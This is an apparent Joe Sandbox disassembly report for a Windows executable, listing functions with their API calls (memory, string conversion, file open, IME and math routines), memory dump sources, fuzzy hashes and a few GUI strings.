memmove.VCRUNTIME140(?,?,?,7FFFFFFFFFFFFFFF), ref: 00007FF69DCD8990
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF69DCD89B3

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2016347663-0
Opcode ID: 774744eb45e0530b27bbaa6349c98f5fca3929f68fd74816389981fc05dec560
Instruction ID: 5c3c669e8eea20d1301f53fd3f35335678d6d6d7f266393ff101e473ab750e4f
Opcode Fuzzy Hash: 774744eb45e0530b27bbaa6349c98f5fca3929f68fd74816389981fc05dec560
Instruction Fuzzy Hash: AA51F432A08B82D2EA209F25D94427D2374FB14B94F144636DFEC57782EF38E19AC341

Function 00007FF69DCE2F20 Relevance: 10.6, APIs: 7, Instructions: 78COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,00000000,00007FF69DCE3076), ref: 00007FF69DCE2F5B
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,00000000,00007FF69DCE3076), ref: 00007FF69DCE2F7D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00007FF69DCE3076), ref: 00007FF69DCE2FB3
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,00000000,00007FF69DCE3076), ref: 00007FF69DCE2FD5
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,00000000,00007FF69DCE3076), ref: 00007FF69DCE2FF9
_wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,00000000,00007FF69DCE3076), ref: 00007FF69DCE3005
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00007FF69DCE3076), ref: 00007FF69DCE3028

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: ByteCharMultiWide$_wfopenfreemalloc
String ID:
API String ID: 2585890673-0
Opcode ID: 9ffd282e1625e97faaf7f05b419da84b74c6dc653c0c63553d245c0b21b3cfb0
Instruction ID: e08189fc0ab2307a7096b4a8ae20b09095dcb824ece155e8a4db3aae1c5ed196
Opcode Fuzzy Hash: 9ffd282e1625e97faaf7f05b419da84b74c6dc653c0c63553d245c0b21b3cfb0
Instruction Fuzzy Hash: 6D319231608B8286E7349F56A510139F6A5FF88BD4F084339DB9E87BA4EF3CD0068740

Function 00007FF69DCF9910 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48COMMON

Download Yara Rule

APIs

ImmGetContext.IMM32 ref: 00007FF69DCF9944
ImmSetCompositionWindow.IMM32 ref: 00007FF69DCF997D
ImmSetCandidateWindow.IMM32 ref: 00007FF69DCF99B6
ImmReleaseContext.IMM32 ref: 00007FF69DCF99C2

Strings

@, xrefs: 00007FF69DCF9995
, xrefs: 00007FF69DCF9957

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: ContextWindow$CandidateCompositionRelease
String ID: $@
API String ID: 3969737024-1077428164
Opcode ID: da45abd6725e7cdc7fb7c868a2eccafa2f206a88efe0a08d9a0cd370891504e9
Instruction ID: e8da1a70668b5cd9723c232643cebdca2f38e90959c940a18ff3b1d48387c51b
Opcode Fuzzy Hash: da45abd6725e7cdc7fb7c868a2eccafa2f206a88efe0a08d9a0cd370891504e9
Instruction Fuzzy Hash: EC210C729187818AE735CF11E64426AB3A1FB89B88F145275DBCD46B18EF3CE545CF00

Function 00007FF69DD066B0 Relevance: 10.2, APIs: 8, Instructions: 173COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DD066FB
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DD067B6
memmove.VCRUNTIME140 ref: 00007FF69DD067D9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DD067FC
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DD068D2
memmove.VCRUNTIME140 ref: 00007FF69DD068E9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DD0692C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DD0694D

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: freemalloc$memmove
String ID:
API String ID: 3069178222-0
Opcode ID: d4e4c406e3c6af694a7c936f6015adb368cf1bf02645b35bd3c9e2f00129d108
Instruction ID: a8c476b148b5d2ffe930f6077a72bfa64104434548e0613048598c04ff49dd97
Opcode Fuzzy Hash: d4e4c406e3c6af694a7c936f6015adb368cf1bf02645b35bd3c9e2f00129d108
Instruction Fuzzy Hash: 03912B32A05B8186EB65CF25E54027C77A4FB98B84F15A275CF8D93761EF38E49AC340

Function 00007FF69DCE1670 Relevance: 9.5, APIs: 6, Instructions: 475COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF69DCE2780: memset.VCRUNTIME140(?,?,00000000,00007FF69DCE16A9), ref: 00007FF69DCE282D

memset.VCRUNTIME140 ref: 00007FF69DCE1708
cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCE1774
memset.VCRUNTIME140 ref: 00007FF69DCE1C09
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCE1DE5
memset.VCRUNTIME140 ref: 00007FF69DCE1E5C
memset.VCRUNTIME140 ref: 00007FF69DCE2202

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: memset$cosfmalloc
String ID:
API String ID: 2754591348-0
Opcode ID: 5a539ee4e01d4d02e85f03c484729c64c70950b52ecd5abc66e71e8ffdd940fe
Instruction ID: a129ba8028c06ac7157df087838b9e7d29795bddc3ae7cf9f3a8b5db922860f4
Opcode Fuzzy Hash: 5a539ee4e01d4d02e85f03c484729c64c70950b52ecd5abc66e71e8ffdd940fe
Instruction Fuzzy Hash: 5762BEB2615BC1AAD31CDF25EA4429AB7A8F745B11FA95329C3B403290DF74B1B0CB0D

Function 00007FF69DCD5760 Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

sinf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD57FC
cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD5808
sinf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD5819
cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD582D
sinf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD583A
cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD5847

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: cosfsinf
String ID:
API String ID: 3160392742-0
Opcode ID: fcb9bc87cdbf3f8ab746cfe251ff8f7ad8188349da32386ff82af752e339a489
Instruction ID: b533db4f1983e5c572d6a38b3843883fe57e2f04376f42e3d14f1d22878cacc0
Opcode Fuzzy Hash: fcb9bc87cdbf3f8ab746cfe251ff8f7ad8188349da32386ff82af752e339a489
Instruction Fuzzy Hash: CF71A311D28FC949E2239B3655422B5E354AFBB2C5F19E733F94A71A72FF2920D78600

Function 00007FF69DCDEEB0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,00000000,?,?,0000000100000000,00007FF69DCDEE22,?,?,?,?,00000000,00007FF69DCD912D), ref: 00007FF69DCDEF9E
memmove.VCRUNTIME140(?,00000000,?,?,0000000100000000,00007FF69DCDEE22,?,?,?,?,00000000,00007FF69DCD912D), ref: 00007FF69DCDEFAC
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,?,0000000100000000,00007FF69DCDEE22,?,?,?,?,00000000,00007FF69DCD912D), ref: 00007FF69DCDEFE5
memmove.VCRUNTIME140(?,?,0000000100000000,00007FF69DCDEE22,?,?,?,?,00000000,00007FF69DCD912D), ref: 00007FF69DCDEFEF
memmove.VCRUNTIME140(?,?,0000000100000000,00007FF69DCDEE22,?,?,?,?,00000000,00007FF69DCD912D), ref: 00007FF69DCDEFFD
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF69DCDF02F

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2016347663-0
Opcode ID: a58a762193a29a1bcbdefa921f85e2ef380445f1a8a8234dad814cae80f426f3
Instruction ID: c693b43e9bf0d37bef66db831b27ed486b538144281c49e646b864a969fd6d0a
Opcode Fuzzy Hash: a58a762193a29a1bcbdefa921f85e2ef380445f1a8a8234dad814cae80f426f3
Instruction Fuzzy Hash: 9E41C662B08781C4EE349B16A9043A9A269EB04FD4F544672EFED477C5EE3CE1468304

Function 00007FF69DCE13D0 Relevance: 8.8, APIs: 7, Instructions: 76COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF69DD02450: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF69DCE13E2), ref: 00007FF69DD0247D
Part of subcall function 00007FF69DD02450: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF69DCE13E2), ref: 00007FF69DD024A6
Part of subcall function 00007FF69DD02450: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF69DCE13E2), ref: 00007FF69DD024CF
Part of subcall function 00007FF69DD02450: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF69DCE13E2), ref: 00007FF69DD02504
Part of subcall function 00007FF69DD02450: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF69DCE13E2), ref: 00007FF69DD0252D
Part of subcall function 00007FF69DD02450: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF69DCE13E2), ref: 00007FF69DD02559

Part of subcall function 00007FF69DD05E40: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF69DCE13E2), ref: 00007FF69DD05EAD
Part of subcall function 00007FF69DD05E40: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF69DCE13E2), ref: 00007FF69DD05EDD
Part of subcall function 00007FF69DD05E40: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DD05F2E

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCE140E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCE1433
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCE1455
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCE1477
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCE1499
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCE14BB
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCE14DD

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: e692933884b511f06a371a5f64a962e5663714305f0b91d5374f10ea26a514f9
Instruction ID: 1198b09eceb99edd2764d4972d3ab2358170cc6045d01c9e44948fc21da58573
Opcode Fuzzy Hash: e692933884b511f06a371a5f64a962e5663714305f0b91d5374f10ea26a514f9
Instruction Fuzzy Hash: 83310E61B0A686C5FF798F11E5416382278FF45B44F08D6B5CA8E93764EF2CA82A9350

Function 00007FF69DCE5760 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 227COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF69DCE595F
memset.VCRUNTIME140 ref: 00007FF69DCE599D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCE59D0
memmove.VCRUNTIME140 ref: 00007FF69DCE59E0

Strings

#MOVE, xrefs: 00007FF69DCE5AAA, 00007FF69DCE5AC3

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: memset$mallocmemmove
String ID: #MOVE
API String ID: 1346079573-3098322713
Opcode ID: 33fd566f3a529c8e8064d13d5f9e868caf75b999f8504b581afdee089f94b77a
Instruction ID: 6088c199af209269f46b28486e2678491df3ecf4e77b0466b3a88aafb8bb2f7b
Opcode Fuzzy Hash: 33fd566f3a529c8e8064d13d5f9e868caf75b999f8504b581afdee089f94b77a
Instruction Fuzzy Hash: 6CC12A32606B819AD754CF29E98879C77A9F705F54FA94239C7A84B3A0DF35E063C708

Function 00007FF69DD19800 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 179COMMON

Download Yara Rule

Strings

context, xrefs: 00007FF69DD19889
##selectable, xrefs: 00007FF69DD19A47
##previewing_picker, xrefs: 00007FF69DD19ACC
Alpha Bar, xrefs: 00007FF69DD19B8C

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID:
String ID: ##previewing_picker$##selectable$Alpha Bar$context
API String ID: 0-280553805
Opcode ID: d2ccd9e9d57b4e27cd3cb2d7e42730fc78a08980861d66e4b428cd3389c48f4a
Instruction ID: fed4d2595d03ad2917c3bbf4209abd77e1651e94e1dc2c1e975444daf05ba590
Opcode Fuzzy Hash: d2ccd9e9d57b4e27cd3cb2d7e42730fc78a08980861d66e4b428cd3389c48f4a
Instruction Fuzzy Hash: 4291B272A186C185E735CF26D4413B977A0FB99B88F086375DECD872A5EF38E5898700

Function 00007FF69DD02450 Relevance: 7.6, APIs: 6, Instructions: 73COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF69DCE13E2), ref: 00007FF69DD0247D
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF69DCE13E2), ref: 00007FF69DD024A6
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF69DCE13E2), ref: 00007FF69DD024CF
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF69DCE13E2), ref: 00007FF69DD02504
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF69DCE13E2), ref: 00007FF69DD0252D
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF69DCE13E2), ref: 00007FF69DD02559

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 64ab0ab5dea34a1869dfd4597e87c764060636b70e6c931114b8a0c744b122b7
Instruction ID: 56084582b5736e553acce18136a7ead4e0eabe94c1f7fda53d4d2a7478c76f8b
Opcode Fuzzy Hash: 64ab0ab5dea34a1869dfd4597e87c764060636b70e6c931114b8a0c744b122b7
Instruction Fuzzy Hash: 5F310C36606B4185EB248F11E55063873E8FF95FC8F1896B5CE8D82B64EF39E41AC390

Function 00007FF69DCD3730 Relevance: 6.2, APIs: 4, Instructions: 179COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF69DCD3870
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF69DCD3937
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF69DCD398C
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF69DCD39C3

Part of subcall function 00007FF69DD1CF50: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0000000100000000,00007FF69DCD2E7C), ref: 00007FF69DD1CF6A

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskmallocmemset
String ID:
API String ID: 1576226334-0
Opcode ID: ca84f0f71ac320cb60d1b07a9ed6bdd6ef8f7cb1f78c50404b11775cb581d9c7
Instruction ID: fea2266463d1f4b106a1af8b599cde88130d13c4f56c90c214974653c1421a6e
Opcode Fuzzy Hash: ca84f0f71ac320cb60d1b07a9ed6bdd6ef8f7cb1f78c50404b11775cb581d9c7
Instruction Fuzzy Hash: F171BF62F59B5284FB20CBA5D8402AC2375FB447A8F545376DEADA7BC9EF389046C340

Function 00007FF69DCD85F0 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF69DCD86F9
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF69DCD87C1

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: Concurrency::cancel_current_taskmemmove
String ID:
API String ID: 1506368922-0
Opcode ID: 78384b69103e27bfd2eaa2fba0366e819137fae091a7438aa0a9835b460dc675
Instruction ID: b9f0554f74d3b1f1065fd2bfe2e0038cd98771d6b6896bd812d6fb8aa031a1ef
Opcode Fuzzy Hash: 78384b69103e27bfd2eaa2fba0366e819137fae091a7438aa0a9835b460dc675
Instruction Fuzzy Hash: 58412421A18742C5FB248F29D80036966A8EF50BD4F104276EAEC67BDAEF3CE053D740

Function 00007FF69DCD4CE0 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF69DCD4D18
memmove.VCRUNTIME140 ref: 00007FF69DCD4DB8
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF69DCD4DD6

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: memmove$Concurrency::cancel_current_task
String ID:
API String ID: 1247048853-0
Opcode ID: d0d92fc3d23aaea99c7b9e78f1ff92c81559e9e86b05e7f9236f9f9f794db63a
Instruction ID: cd6db063343aa7a27bb5251b35d82d631e3d4b46fcb91b17e368a5a9f43d18af
Opcode Fuzzy Hash: d0d92fc3d23aaea99c7b9e78f1ff92c81559e9e86b05e7f9236f9f9f794db63a
Instruction Fuzzy Hash: 4321C722A4D74699EB359B51E9403B91168DF04BA4F180771DFAD877C6FE7CA0938300

Function 00007FF69DCE37E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

__stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF69DCE3821
__stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF69DCE38C9

Part of subcall function 00007FF69DCFAA30: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCFAA5F
Part of subcall function 00007FF69DCFAA30: memmove.VCRUNTIME140 ref: 00007FF69DCFAA77
Part of subcall function 00007FF69DCFAA30: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCFAA97

Strings

[io] %s: AppFocused %d, xrefs: 00007FF69DCE37EA

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
